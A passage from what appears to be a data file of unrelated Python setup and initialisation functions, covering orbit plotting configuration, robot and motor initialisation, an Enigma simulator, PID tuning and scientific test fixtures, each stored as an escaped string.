fallback=0)\n OP.MCMCfile = config.get('plotting', 'McmcDataFile', fallback=None)\n \n # colorbar settings\n OP.usecolorbar = config.getboolean('plotting', 'use_colorbar', fallback=False)\n OP.color_map = config.get('plotting', 'colormap', fallback= 'viridis')\n OP.cmref = config.get('plotting', 'reference', fallback='msec_jup')\n\n # which planet to plot?\n OP.iplanet = config.getint('plotting', 'iplanet', fallback=0)\n \n # customized range of epochs\n OP.start_epoch = config.getfloat('plotting', 'start_epoch', fallback=1950)\n OP.end_epoch = config.getfloat('plotting', 'end_epoch', fallback=2030)\n \n # predicted epoch positions\n OP.predicted_ep = config.get('plotting', 'predicted_years', fallback=('2010,2020')).split(\",\")\n OP.predicted_ep_ast = config.getfloat('plotting', 'position_predict', fallback=2000)\n # how many random orbits\n OP.num_orbits = config.getint('plotting', 'num_orbits', fallback = 50)\n \n # step size\n OP.num_steps = config.getint('plotting', 'num_steps', fallback = 1000)\n \n # plot axes settings\n OP.set_limit = config.getboolean('plotting', 'set_limit', fallback=False)\n OP.user_xlim = config.get('plotting', 'xlim', fallback=None).split(\",\")\n OP.user_ylim = config.get('plotting', 'ylim', fallback=None).split(\",\")\n \n # show or not show title, add a text on the plot\n OP.show_title = config.getboolean('plotting', 'show_title', fallback=False)\n OP.add_text = config.getboolean('plotting', 'add_text', fallback=False)\n OP.text_name = config.get('plotting', 'text_name', fallback=None)\n OP.x_text = config.getfloat('plotting', 'x_text', fallback=None)\n OP.y_text = config.getfloat('plotting', 'y_text', fallback=None)\n \n # marker settings\n OP.marker_color = config.get('plotting', 'marker_color', fallback= 'coral')\n \n # plot which instrument for the RV plot, starting from 1,2 ... 
n\n OP.whichInst = config.get('plotting', 'RV_Instrument', fallback=False)\n \n # plot the two proper motion plots separately or together\n OP.pm_separate = config.getboolean('plotting', 'Proper_motion_separate_plots', fallback=False)\n \n #save data\n OP.save_params = config.getboolean('save_results', 'save_params', fallback=True)\n OP.err_margin = config.get('save_results', 'err_margin', fallback= ('0.16, 0.5, 0.84')).split(\",\")\n \n args = parse_args_plotting()\n OP.outputdir = args.output_dir\n\n # initialize the OP object\n OP.start()\n return OP", "def _setup_self(self, model_num =0):\n self.all_residues = self._setup_all_residues(model_num) #vector1 of Bio Residues\n self.pdb_info = self._setup_pdb_info() #PDBInfo to map the vector1\n self.peptide_bond_distances = self._setup_peptide_bond_distances() #map of bond distances to next residue in pose.", "def setUp(self):\n \n self.ReconstructionObj = Reconstruction(c, dX, dY, dXg, dYg, dXqg, dYqg, Xr, Yr, dXq, dYq, outx_cal, outy_cal, dXql, dYql, dWx, dWy, Wf1, W, Wrms, delta, yb, x_edge, z_basis, coeff, nz, mz, nn, a, b, a1, b1, theta, jx, jy, ma, xx, outx_l)\n\n self.c = self.ReconstructionObj.c\n self.dX = self.ReconstructionObj.dX\n self.dY = self.ReconstructionObj.dY\n self.dXg = self.ReconstructionObj.dXg\n self.dYg = self.ReconstructionObj.dYg\n self.dXqg = self.ReconstructionObj.dXqg\n self.dYqg = self.ReconstructionObj.dYqg\n self.Xr = self.ReconstructionObj.Xr\n self.Yr = self.ReconstructionObj.Yr\n self.dXq = self.ReconstructionObj.dXq\n self.dYq = self.ReconstructionObj.dYq\n self.outx_cal = self.ReconstructionObj.outx_cal\n self.outy_cal = self.ReconstructionObj.outy_cal\n self.dXql = self.ReconstructionObj.dXql\n self.dYql = self.ReconstructionObj.dYql\n self.dWx = self.ReconstructionObj.dWx\n self.dWy = self.ReconstructionObj.dWy\n self.Wf1 = self.ReconstructionObj.Wf1\n self.W = self.ReconstructionObj.W\n self.Wrms = self.ReconstructionObj.Wrms\n self.delta = self.ReconstructionObj.delta\n self.yb = self.ReconstructionObj.yb\n self.x_edge = self.ReconstructionObj.x_edge\n self.z_basis = self.ReconstructionObj.z_basis\n self.coeff = self.ReconstructionObj.coeff\n self.nz = self.ReconstructionObj.nz\n self.mz = self.ReconstructionObj.mz\n self.nn = self.ReconstructionObj.nn\n self.a = self.ReconstructionObj.a\n self.b = self.ReconstructionObj.b\n self.a1 = self.ReconstructionObj.a1\n self.b1 = self.ReconstructionObj.b1\n self.theta = self.ReconstructionObj.theta\n self.jx = self.ReconstructionObj.jx\n self.jy = self.ReconstructionObj.jy\n self.ma = self.ReconstructionObj.ma\n self.xx = self.ReconstructionObj.xx\n self.outx_l = self.ReconstructionObj.outx_l\n \n pass", "def Init(self):\n RobotMap.Init()\n from commands import *\n from subsystems import *\n#@autogenerated_code(\"constructors\", \" \")\n#parse(\"${exporter-path}core/robot-constructors.py\")\n#end\n # This MUST be here. If the OI creates Commands (which it very likely\n # will), constructing it during the construction of CommandBase (from\n # which commands extend), subsystems are not guaranteed to be\n # yet. Thus, their requires() statements may grab null pointers. Bad\n # news. 
Don't move it.\n self.oi = OI()\n\n # instantiate the command used for the autonomous period", "def initialize(self) -> None:\n # Set motors to stop, read encoder values for starting point\n self.drive.arcadeDrive(0, 0)\n self.drive.resetEncoders()", "def initialise(self):\n self.set_up()", "def test_init(self):\n # call function to test\n test_object = ScipyOdeSolver(integrator=self._integrator, **self._kwargs)\n assert test_object._solver is None\n assert test_object._solver_args == self._kwargs, 'unexpected additional arguments. Keep in mind None and {}.'\n assert test_object._integrator == self._integrator, 'unexpected initialization of integrate function'", "def robotInit(self):\n # Update constants from json file on robot\n Constants.updateConstants()\n # Robot odemetry command\n self.updateodemetry = updateodemetry.UpdateOdemetry()\n # Set command group member variables\n self.autonomous = autogroup.AutonomousCommandGroup()\n self.disabled = disabledgroup.DisabledCommandGroup()\n self.teleop = teleopgroup.TeleopCommandGroup()\n self.test = testgroup.TestCommandGroup()", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def initialise_sim(self):\n pass", "def __init__ (self, outdir, geometry, phasef, regen_velocity = True):\n ll.info (\"== setting up TauP\")\n\n self.outdir = outdir\n self.phasef = phasef\n self.set_geometry (geometry, regen_velocity)", "def setup():\n\n self.zorp_mock = Mock()\n\n for name, func in six.iteritems(self._get_zorp_mock_methods()):\n self.zorp_mock.server.registry.put(name, func)\n\n self.zorp_mock.start()", "def _setup_simulation(self\n ) -> None:\n pass", "def __initilization(self,node_set):\n \n print \"*********************************\"\n \n for x in node_set:\n x.node_vol=np.transpose(np.matrix([cmath.exp(0), cmath.exp(complex(0,math.pi*2/3)), cmath.exp(complex(0,-math.pi*2/3))]))\n \n print \"Forward/Backward Algorithm Initialization Done!\"", "def _setup_params(self) -> None:\n self.i = 0 # Year\n self.ela = self.ela_start # Equilibrium line altitude\n self.steady_state = False # Control variable for steady state\n self.fracd8_mode = \"limited\" # Mode of the fracd8 algorithm", "def initialise(self):", "def __init__(self):\n\n self.plugboard = None\n self.rotors = []\n self.reflector = None", "def GetUserSettings(self):\n \n # alphabet, notch, turnover, position, ringSetting\n # ABCDEFGHIJKLMNOPQRSTUVWXYZ\n self._rotor1 = rotor('EKMFLGDQVZNTOWYHXUSPAIBRCJ','Y','Q', 1, 1) #Create a default rotor I object\n self._rotor2 = rotor('AJDKSIRUXBLHWTMCQGZNPYFVOE','M','E', 1, 1) #Create a default rotor II object\n self._rotor3 = rotor('BDFHJLCPRTXVZNYEIWGAKMUSQO','D','V', 1, 1) #Create a default rotor III object\n self._rotor4 = rotor('ESOVPZJAYQUIRHXLNFTGKDCMWB','R','J', 1, 1) #Create a default rotor IV object\n self._rotor5 = rotor('VZBRGITYUPSDNHLXAWMJQOFECK','H','Z', 1, 1) #Create a default rotor V object\n \n self._UKWA = reflector('AE BJ CM DZ FL GY HX IV KW NR OQ PU ST') #Create a default A reflector object\n self._UKWB = reflector('AY BR CU DH EQ FS GL IP JX KN MO TZ VW') #Create a default B reflector object\n self._UKWC = reflector('AF BV CP DJ EI GO HY KR LZ MX NW QT SU') #Create a default C reflector object\n \n loopRotors = True\n while loopRotors == True: #While user input is invalid\n rotorL, rotorM, rotorR = input(\"\\nEnter rotor setup: \").upper().split() #Prompt the user to enter the rotor setup\n if rotorL == 
rotorM or rotorL == rotorR or rotorM == rotorR: #If the user has used the same rotor \n print('Rotors can not be the same. Try again.') #Inform them that they cannot use the same rotors and prompt again\n else:\n loopRotors = False #Otherwise continue with the program\n \n reflectorType = input(\"Enter reflector type: \").upper() #Prompt user to enter reflector type\n \n loopPlugboard = True\n while loopPlugboard == True: #While user input is invalid\n plugboardPairs = input('\\nEnter plugboard pairs: ').upper().strip() #Prompt user to enter plugboard pairs\n stringPairs = plugboardPairs.replace(\" \", \"\") #Remove any spaces\n \n if len(stringPairs) != 0: #If the user has entered plugboard pairs\n frequencies = collections.Counter(stringPairs) #Count the frequency of each character \n repeated = {}\n for k, v in frequencies.items(): #For every frequency pair\n if v > 1: #If there is more than one occurrence\n repeated[k] = v #Add it to the repeated dictionary\n if len(repeated) != 0: #If there are repeats in the repeated dictionary\n print('Each character may only connect to another character. Try again.') #Prompt the user to enter the plugboard pairs again\n loopPlugboard = True\n else:\n loopPlugboard = False #Otherwise continue with the program\n else:\n loopPlugboard = False #Continue with the program if there is not input for the plugboard pairs\n \n rotors = {'I':self._rotor1, 'II':self._rotor2, 'III':self._rotor3, 'IV':self._rotor4, 'V':self._rotor5} #Match each rotor type to their rotor object\n reflectors = {'A':self._UKWA, 'B':self._UKWB, 'C':self._UKWC} #Match each reflector type to their reflector object\n \n self._rotorL = rotors.get(rotorL) #Assign the corresponding rotor object to the rotor\n self._rotorM = rotors.get(rotorM)\n self._rotorR = rotors.get(rotorR)\n \n self._UKW = reflectors[reflectorType] #Assign the corresponding reflector object to the reflector\n \n self._plugboard = plugboard(plugboardPairs) #Assign the corresponding plugboard object to the plugboard", "def orbit_index():\n return OrbitController.invoke(OUTPUT_DIRECTORY)", "def antenny_init_components(self):\n if self.antenny_config is None:\n print(\"Please load a config before initializing components\")\n if not self.antenny_config.check():\n print(\"Config {} is not valid, failed to initialize\".format(self.antenny_config.get_name()))\n print(\"If you believe this is an error, or you have modified the base components of the antenny board, \"\n \"please check Config class as well as the default configs for more details.\")\n\n self.imu_init()\n self.pwm_controller_init()\n self.elevation_servo_init()\n self.azimuth_servo_init()\n self.screen_init()\n self.gps_init()\n self.telemetry_init()\n self.platform_init()", "def setupTown(self):\n\t\t# create a test square to determine participant distance\n\t\tself.vr.resetEnvironment()\n\t\t\n\t\tself.vr.addSkyBox(self.config.blackImage)\n\t\tself.vr.addFloorBox(0.0, -1.0, 0.0, self.config.unitScale, self.config.unitScale, self.config.unitScale,\n\t\t\t\t\t\tself.config.blackImage, None, self.config.blackImage, None)\n\t\tself.vr.setGravity(0.0, -0.1, 0.0)\n\t\tself.vr.addPlaneGeom(0.0, 1.0, 0.0, 0.0, mu = 0.0)\n\t\tself.vr.addBuildingBox(0.0, 0.95, -0.5, self.config.whiteImage, 0.1, 0.1)", "def setup_simulation(self, **kwargs):\n\n self.distance = self.config[\"site\"][\"distance\"]\n self.num_substations = self.config[\"num_substations\"]\n\n self.initialize_substructure_production()\n self.initialize_installation_vessel()", "def setUp(self):\n\n self.eps = 
0.001 # Accept 0.1 % relative error\n\n self.RSISE = Point(-35.27456, 149.12065)\n self.Home = Point(-35.25629, 149.12494) # 28 Scrivener Street, ACT\n self.Syd = Point(-33.93479, 151.16794) # Sydney Airport\n self.Nadi = Point(-17.75330, 177.45148) # Nadi Airport\n self.Kobenhavn = Point(55.70248, 12.58364) # Kobenhavn, Denmark\n self.Muncar = Point(-8.43, 114.33) # Muncar, Indonesia", "def _setup(self):\n\n # Get user data\n self.symbols = self._get_symbols()\n self.data_dict = self._get_data()\n self.portfolio = self.initialize_portfolio()\n\n if 'slippage' in self.portfolio:\n self.slippage = self.portfolio['slippage']\n else:\n self.slippage = None\n\n # Keep track of all trades\n self.trade_manager = TradeManager(\n self.symbols, self.portfolio, self.sql_config\n )\n\n # Initialize state variables that are updated each iteration\n self.date = None\n self.data = None\n self.symbol = None\n self.currency = None\n self.last_buy = None\n self.num_unresolved = 0\n self.unresolved_trade = False", "def setUp(self):\n self.iv1 = Interval(1, 10)\n self.iv2 = Interval(5, 15)\n self.iv1_r = Interval(10, 1)\n self.iv2_r = Interval(15, 5)\n self.iv3 = Interval(3, 8)\n self.iv4 = Interval(11, 20)", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "def set_projectors(self, projectors):\n assert len(\n projectors\n ) == self.nwann, \"The number of projectors != number of wannier functions\"\n self.projectors = projectors", "def configure(self):\n super(ProjectionMatrix, self).configure()\n if self.sensors is None:\n self.sensors = self.skin_air.sensors\n\n if isinstance(self.sensors, sensors_module.SensorsEEG):\n self.skin_air.sensors = self.sensors\n self.skin_air.sensors_to_surface, self.skin_air.sensor_locations = self.sensors.sensors_to_surface(self.skin_air)\n\n # Create OpenMEEG objects from TVB objects.\n self.om_head = self.create_om_head()\n self.om_sources = self.create_om_sources()\n self.om_sensors = self.create_om_sensors()\n\n # Calculate based on type of sources\n if isinstance(self.sources, surfaces_module.Cortex):\n self.om_source_matrix = self.surface_source() #NOTE: ~1 hr\n elif isinstance(self.sources, connectivity_module.Connectivity):\n self.om_source_matrix = self.dipole_source()\n\n # Calculate based on type of sensors\n if isinstance(self.sensors, sensors_module.SensorsEEG):\n self.om_head2sensor = self.head2eeg()\n elif isinstance(self.sensors, sensors_module.SensorsMEG):\n self.om_head2sensor = self.head2meg()\n if isinstance(self.sources, surfaces_module.Cortex):\n self.om_source2sensor = self.surf2meg()\n elif isinstance(self.sources, connectivity_module.Connectivity):\n self.om_source2sensor = self.dip2meg()\n\n #NOTE: ~1 hr\n self.om_inverse_head = self.inverse_head(inv_head_mat_file = \"hminv_uid\")", "def load_orbit(data):\n\n type = data[\"type\"]\n if type == \"circular\":\n radius = data[\"radius\"]\n orbital_period = data[\"orbital_period\"] * dts\n inclination = data[\"inclination\"]\n return CircularOrbit(radius, orbital_period, inclination)\n elif type == \"elliptic\":\n apoapsis = data[\"apoapsis\"]\n periapsis = data[\"periapsis\"]\n longtitude_ascending_node = 
data[\"longtitude_ascending_node\"]\n argument_of_periapsis = data[\"argument_of_periapsis\"]\n inclination = data[\"inclination\"]\n initial_mean_anomaly = data[\"initial_mean_anomaly\"]\n multiplier = data[\"multiplier\"]\n return EllipticOrbit(apoapsis, periapsis, longtitude_ascending_node, argument_of_periapsis, inclination, initial_mean_anomaly=initial_mean_anomaly, multiplier=multiplier)\n else:\n raise TypeError(\"type \" + type + \" is invalid\")", "def _setup_world(self, taskname):\n self.x0 = self._hyperparams[\"x0\"]\n self._world = [gym.make(taskname)\n for _ in range(self._hyperparams['conditions'])]", "def setup(self):\n # if not system.restore_snapshot():\n # self.log.debug(\"No snapshot to restore, if this is not expected please contact automation team\")\n crindsim.set_mode(\"manual\")\n pos.connect()\n pos.sign_on()", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def get_orbitals(self, q_numbers, exponents, coefficients, r):\n # Begin by calculating the values of the Slater function, and its first 2 derivatives\n # for the given exponents.\n # gives (n, r) dimension [where n is number of functions]\n f = self.G(q_numbers, exponents, r)\n df = self.DG(q_numbers, exponents, r, f)\n ddf = self.DDG(q_numbers, exponents, r, f)\n\n # Now construct the orbitals by multiplication with orbital coefficients\n of = np.einsum('ij,jk->ik', coefficients, f) # (i=orbital, j=function, k=r)\n dof = np.einsum('ij,jk->ik', coefficients, df)\n ddof = np.einsum('ij,jk->ik', coefficients, ddf)\n return of, dof, ddof", "def auto_setup(self):\n if self.mot_type == \"xps8p\":\n return\n if self.get_par(\"err_sevr\") == 3:\n print \"Reinitializing motor {}...\".format(self.name)\n self.reinit()\n ok = self.wait_par(\"err_sevr\", 3, match_value=False, timeout=20)\n if ok:\n print \"Successfully reinitialized {}.\".format(self.name)\n time.sleep(0.5)\n else:\n print \"Reinitializing {} timed out. 
Aborting auto_setup.\".format(self.name)\n return\n\n for i in range(3):\n for clear, name in ((self.clear_pu, \"powerup\"),\n (self.clear_stall, \"stall flag\"),\n (self.clear_error, \"error flag\")):\n clear(check=True, wait=False)\n\n ok = []\n for bit, mask in ((RA_POWERUP, 1), (RA_STALL, 1), (RA_ERR, RA_ERR_MASK)):\n ok.append(self._wait_msta_bit(bit, 0, mask, timeout=10))\n if not all(ok):\n print \"Issues with clearing flags for {}\".format(self.name)\n\n try: # Not every environment has pmgr access\n self.pmgr.apply_config(dumb_config=self.name)\n except:\n pass", "def on_initialize_corridors_button_clicked(self):\n if self.qr_polytraj is None or self.corridors_init is True:\n return\n\n map = self.check_for_map()\n if map is None:\n return\n\n # Get minimum distance for each segment\n l_max = self.compute_nearest_distance_to_obstacles(self.qr_polytraj.waypoints)\n\n # find the segments currently in collision\n collision_segs = self.find_segments_in_collision()\n\n for i in range(self.qr_polytraj.n_seg):\n if i in collision_segs or self.all_corridors:\n # For each segment in collision\n self.add_corridor_constraint(i,l_max[i],weight=100.0)\n\n\n if not self.defer:\n self.qr_polytraj.run_astro(replan=True)\n self.update_path_markers()\n acc_wp = self.get_accel_at_waypoints(\"main\")\n # self.interactive_marker_worker.make_controls(self.qr_polytraj.waypoints)\n self.interactive_marker_worker.update_controls(self.qr_polytraj.waypoints,acc_wp = acc_wp)\n\n self.corridors_init = True", "def orbit(*args, horizontalAngle: float=0.0, pivotPoint: List[float, float, float]=None,\n rotationAngles: List[float, float]=None, verticalAngle: float=0.0, **kwargs)->None:\n pass", "def getorbit(sat, tfinal, tstep, trec):\n ntimes = (int)(tfinal/tstep)\n n_tvals = (int)(tfinal/trec)\n state_arr = np.zeros((6, n_tvals))\n orbelem_arr = np.zeros((6, n_tvals))\n s_major_arr = np.zeros(n_tvals)\n count = 0\n for i in range(ntimes):\n sat.rk4_step_sat(tstep)\n if i % (trec/tstep) == 0:\n state_arr[:, count] = sat.getstate()\n orbelem_arr[:, count] = sat.orb_elem()\n s_major_arr[count] = sat.get_a()\n tether = sat.get_tether()\n tether.setlamda_a(sat)\n tether.set_iv(sat)\n print state_arr[0, count]\n print count\n count += 1\n return (state_arr, orbelem_arr, s_major_arr)", "def _init_system(*args):\n __set_time_elements(args[0], args[1])\n __set_control_elements(args[0], args[2], args[3])\n __set_sensor_elements(args[0], args[4], args[5], args[6], args[7])", "def __init__(self, gameMap, initDirec=None, initBodies=None, initTypes=None):\n\t\tself._map = gameMap\n\t\tself._initDirec = initDirec\n\t\tself._initTypes = initTypes\n\t\tself._initBodies = initBodies\n\t\tself.reset(False)", "def init():\n print(\"initializing...\")\n print(\"setting relays off\")\n for pin in PINS:\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, RELAYOFF)", "def __init__(self, planes, cosmology):\r\n self.planes = planes\r\n self.plane_redshifts = [plane.redshift for plane in planes]\r\n self.cosmology = cosmology", "def __init__(self):\n self.RRTFamilySolver = RRTFamilyPathPlanner()\n self.PRMSolver = PRMPathPlanner()", "def setupWidget(self):\r\n self.generateCoordinates()\r\n self.modifyCoordinateLists()\r\n self.settings.movementMatrix = self.movementMatrix\r\n self.settings.ghostIntersectionList = self.ghostIntersectionList\r\n self.createBodies()\r\n print(\"GameW set\")", "def test_ocean() -> None:\n cfg = load_config()\n setup = ModelSetup(str(TEST_DIREC), cfg)\n ocean = Ocean(cfg, setup)\n ocean.compile_all()\n if 
cfg.run:\n ocean.run_all()\n if cfg.animate:\n ocean.animate_all()", "def autonomousInit(self):\n fieldState = self.driverStation.getGameSpecificMessage()\n self.fieldState = fieldState\n self.smartDashboard.putString(\"field state\", fieldState)\n fieldPosition = self.smartDashboard.getString(\"field position\", \"\")\n self.startingFieldPosition = self.parserobotFieldPosition(fieldPosition)\n self.smartDashboard.putNumber(\"position\", self.startingFieldPosition)\n \n #convert field states to our enum values \n self.ourSwitchSide = self.parserobotFieldPosition(self.fieldState[0])\n self.scaleSide = self.parserobotFieldPosition(self.fieldState[1])\n self.theirSwitchSide = self.parserobotFieldPosition(self.fieldState[2])\n if self.startingFieldPosition==self.kNothing:\n print(\"No field position set. Aborting\")\n return \n \n \n #self.Encoder.setMaxPeriod(.1)\n #self.Encoder.setMinRate(10)\n #self.Encoder.setDistancePerPulse(5)\n #self.Encoder.setReverseDirection(True)\n #self.Encoder.getDistance()\n \n \"\"\"self.Encoder.reset()\n while (self.Encoder.get() < value):\n drive\n delay\"\"\"\n \n \n \n \n \n \n \n #self.Encoder.getRawAxis()\n \n \n #todo change RRR to from fms, maybe parse it first\n \n self.autonomousProgram = commands.autonomousCommand.AutonomousProgram(self.startingFieldPosition)\n self.autonomousProgram.start()", "def init(self):\n self.focus_modes = []\n for focus_mode in self['focusModes']:\n self.focus_modes.append(\\\n {'modeName': focus_mode.modeName,\n 'lensCombination': eval(focus_mode.lensCombination),\n 'lensModes': eval(focus_mode.lensModes),\n 'size': eval(focus_mode.size),\n 'message': eval(focus_mode.message),\n 'diverg': eval(focus_mode.divergence)})\n self.focus_motors_dict = {}\n\n focus_motors = []\n focus_motors = eval(self.getProperty('focusMotors'))\n\n for focus_motor in focus_motors:\n self.focus_motors_dict[focus_motor] = []\n\n #TODO\n self.motors_groups = [self.getObjectByRole(\"P14ExpTbl\"),\n self.getObjectByRole(\"P14KB\"),\n self.getObjectByRole(\"P14DetTrans\"),\n self.getObjectByRole(\"P14BCU\"),\n self.getObjectByRole(\"slitsMotors\")]\n \n\n if len(self.motors_groups) > 0:\n for motors_group in self.motors_groups:\n self.connect(motors_group,\n 'mGroupFocModeChanged',\n self.motor_group_focus_mode_changed)\n else:\n logging.getLogger(\"HWR\").debug('BeamFocusing: No motors defined')\n self.active_focus_mode = self.focus_modes[0]['modeName']\n self.size = self.focus_modes[0]['size']\n self.update_values()\n\n self.cmd_set_calibration_name = self.getCommandObject(\\\n 'cmdSetCallibrationName')\n try:\n self.cmd_set_phase = eval(self.getProperty('setPhaseCmd'))\n except:\n pass", "def setup(self):\n\n for row_pin in keypad_row_pins:\n #Set up row-pins\n self.gpio.setup(row_pin, self.gpio.OUT)\n\n for col_pin in keypad_col_pins:\n #Set up col-pins\n self.gpio.setup(col_pin, self.gpio.IN)", "def test_initialisation(self):\n currency_endowment = {\"FET\": 100}\n good_endowment = {\"good_id\": 2}\n self.ownership_state.init(\n amount_by_currency_id=currency_endowment,\n quantities_by_good_id=good_endowment,\n )\n assert self.ownership_state.amount_by_currency_id is not None\n assert self.ownership_state.quantities_by_good_id is not None\n assert self.ownership_state.is_initialized", "def __init__(self, x_traj=[], y_traj=[], period=0, num_div_action=5,\n closed=True, differential_car=True, discrete_input=False):\n\n # Size of the space\n self.max_x = SPACE_X / 2 # [m]\n self.max_y = SPACE_Y / 2 # [m]\n self.state = []\n self.x_trajectory = 
x_traj\n self.y_trajectory = y_traj\n self.r= 0.0325 # [m] wheel´s radius\n self.rho = 0.133 # [m] distance between wheel\n self.time = period # frames per second\n\n # More steps for Ackerman model because circuit is longer\n if discrete_input:\n self.max_steps = 600\n else:\n self.max_steps = 600\n\n self.constant = -0.1\n self.x_ant = 0.0\n self.y_ant = 0.0\n # Sqr of the limit distance\n self.zone_0_limit = ZONE0_LIMIT\n self.zone_1_limit = ZONE1_LIMIT\n self.zone_2_limit = ZONE2_LIMIT\n if discrete_input:\n self.zone_2_limit = 0.08\n else:\n self.zone_2_limit = ZONE2_LIMIT\n\n self.num_div_action = num_div_action\n self.num_div_state = num_div_action\n\n # It is to inform if it´s an closed circuit without ending\n self.closed = closed\n\n # Distance between axis in Ackerman car\n self.l_ack = 0.245\n # Radius of wheels of the Ackerman car\n self.r_ack = 0.035\n # Maximum angle of the wheels of the Ackerman car\n self.alpha_ack = 25.34*np.pi/180\n\n # Choose car model\n self.differential_car = differential_car\n\n self.discrete_input = discrete_input\n\n # parameters to add noise to x, y, angle values\n # self.mu = 0\n # self.sigmaxy = 0.002\n # self.sigmaangle = 2*np.pi/180", "def __init__(self, front_left_wheel, front_right_wheel,\n\t\t\t\t rear_left_wheel, rear_right_wheel):\n\t\tself._front_left_wheel = front_left_wheel\n\t\tself._front_right_wheel = front_right_wheel\n\t\tself._rear_left_wheel = rear_left_wheel\n\t\tself._rear_right_wheel = rear_right_wheel", "def setup_class(self):\n args = {'pdb_path':'/sdf/home/a/apeck/tomoxtal/examples/input/193l.pdb', 'resolution':6.0, 'size':250}\n\n # generate structure factors and retrieve associated cell information\n sf = cctbx_tools.reference_sf(args['pdb_path'], args['resolution'], expand_to_p1=True)\n sf_data = cctbx_tools.reformat_sf(sf)\n sg_symbol, sg_no, self.cell, cs = cctbx_tools.unit_cell_info(args['pdb_path'])\n \n # add random phase shifts\n hklIp1, hklIp2, hklIp3 = sf_data.copy(), sf_data.copy(), sf_data.copy()\n hklIp2[:,-1], self.shifts2 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n hklIp3[:,-1], self.shifts3 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n\n # retain subset of Millers\n for data in [hklIp1,hklIp2,hklIp3]:\n keep_idx = np.unique(np.random.randint(0, high=data.shape[0], size=args['size']))\n data = data[keep_idx]\n \n self.data1, self.data2, self.data3 = hklIp1, hklIp2, hklIp3\n fshifts_list = np.random.uniform(size=(4,3))\n self.fshifts_list = np.vstack((fshifts_list, 1-self.shifts2, 1-self.shifts3))", "def setup(self):\n for lane in self.lanes.values():\n for p in range(lane.starting_patrons):\n patron = Patron(\n lane=lane,\n lane_speed=self.patron_speed,\n pause_duration=self.patron_pause,\n )\n\n patron.pos = patron.pos[0], patron.pos[1] + 15\n lane.puck_area.add_widget(patron)\n lane.patrons.append(patron)", "def init_motors(self):\n # self.maxVelocity = 576# -> 5 m/s\n # self.maxTorque = 30\n\n # motor init\n for m in self.motors:\n m.setPosition(float('inf'))\n m.setVelocity(1.)\n\n # Propeller PID control params tunned with Ziegler–Nichols PID\n K_u = 150.\n T_u = 342.857 / 1000. # ms\n # no overshoot\n params_roll = {'P': K_u / 5., 'I': (2. / 5.) * K_u / T_u,\n 'D': K_u * T_u / 15., 'sp': 0.}\n self.rollPID = PID(params_roll['P'], params_roll['I'],\n params_roll['D'], setpoint=params_roll['sp'],\n output_limits=(-2., 2.), sample_time=self.deltaT)\n\n K_u = 150.\n T_u = 682.66 / 1000. # ms\n # no overshoot\n params_pitch = {'P': K_u/5.,\n 'I': (2. / 5.) 
* K_u / T_u,\n 'D': K_u*T_u/15.,\n 'sp': 0.}\n self.pitchPID = PID(params_pitch['P'], params_pitch['I'],\n params_pitch['D'], setpoint=params_pitch['sp'],\n output_limits=(-2., 2.), sample_time=self.deltaT)\n K_u = 20.\n T_u = 1621.33 / 1000. # ms\n # PD\n params_yaw = {'P': 0.8 * K_u,\n 'I': 0.,\n 'D': K_u * T_u / 10.,\n 'sp': self.target_yaw}\n self.yawPID = PID(params_yaw['P'], params_yaw['I'], params_yaw['D'],\n setpoint=params_yaw['sp'], output_limits=(-2., 2.),\n sample_time=self.deltaT, error_map=pi_clip)\n\n K_u = 20.\n T_u = 2668.8 / 1000. # ms\n # PD\n params_vert = {'P': 0.8 * K_u,\n 'I': 0.,\n 'D': K_u * T_u / 10.,\n 'sp': self.target_altitude}\n self.vertPID = PID(params_vert['P'], params_vert['I'],\n params_vert['D'], setpoint=params_vert['sp'],\n output_limits=(-5., 5.), sample_time=self.deltaT)\n\n return True", "def initial_conditions(self):\n e = self.get_property_all_planets('e')\n pi = self.get_property_all_planets('pi')*np.pi/180\n i = self.get_property_all_planets('i')*np.pi/180\n omega = self.get_property_all_planets('Omega')*np.pi/180\n\n h = np.array(e*np.sin(pi), dtype='complex128')\n k = np.array(e*np.cos(pi), dtype='complex128')\n p = np.array(i*np.sin(omega), dtype='complex128') # WHY DIVIDE BY 2 TO MATCH LASKAR 1986\n q = np.array(i*np.cos(omega), dtype='complex128')\n\n return h, k, p, q", "def _orbital_radii():\n return { \"Li\":( 0.985, 0.625 ), \n \"Be\":( 0.64, 0.44 ), \n \"B\":( 0.48, 0.315 ), \n \"C\":( 0.39, 0.25 ), \n \"N\":( 0.33, 0.21 ), \n \"O\":( 0.285, 0.18 ), \n \"F\":( 0.25, 0.155 ), \n \"Ne\":( 0.22, 0.14 ), \n \n \"Na\":( 1.10, 1.55 ), \n \"Mg\":( 0.90, 1.13 ), \n \"Al\":( 0.77, 0.905 ), \n \"Si\":( 0.68, 0.74 ), \n \"P\":( 0.60, 0.64 ), \n \"S\":( 0.54, 0.56 ), \n \"Cl\":( 0.50, 0.51 ), \n \"Ar\":( 0.46, 0.46 ), \n \n \"K\":( 1.54, 2.15, 0.37 ),\n \"Ca\":( 1.32, 1.68, 0.34 ),\n \"Sc\":( 1.22, 1.53, 0.31 ),\n \"Ti\":( 1.15, 1.43, 0.28 ),\n \"V\":( 1.09, 1.34, 0.26 ),\n \"Cr\":( 1.07, 1.37, 0.25 ),\n \"Mn\":( 0.99, 1.23, 0.23 ),\n \"Fe\":( 0.95, 1.16, 0.22 ),\n \"Co\":( 0.92, 1.10, 0.21 ),\n \"Ni\":( 0.96, 1.22, 0.195 ),\n \"Cu\":( 0.88, 1.16, 0.185 ),\n \"Zn\":( 0.82, 1.06, 0.175 ),\n \"Ga\":( 0.76, 0.935, 0.17 ),\n \"Ge\":( 0.72, 0.84, 0.16 ),\n \"As\":( 0.67, 0.745, 0.155 ),\n \"Se\":( 0.615, 0.67, 0.15 ),\n \"Br\":( 0.58, 0.62, 0.143 ),\n 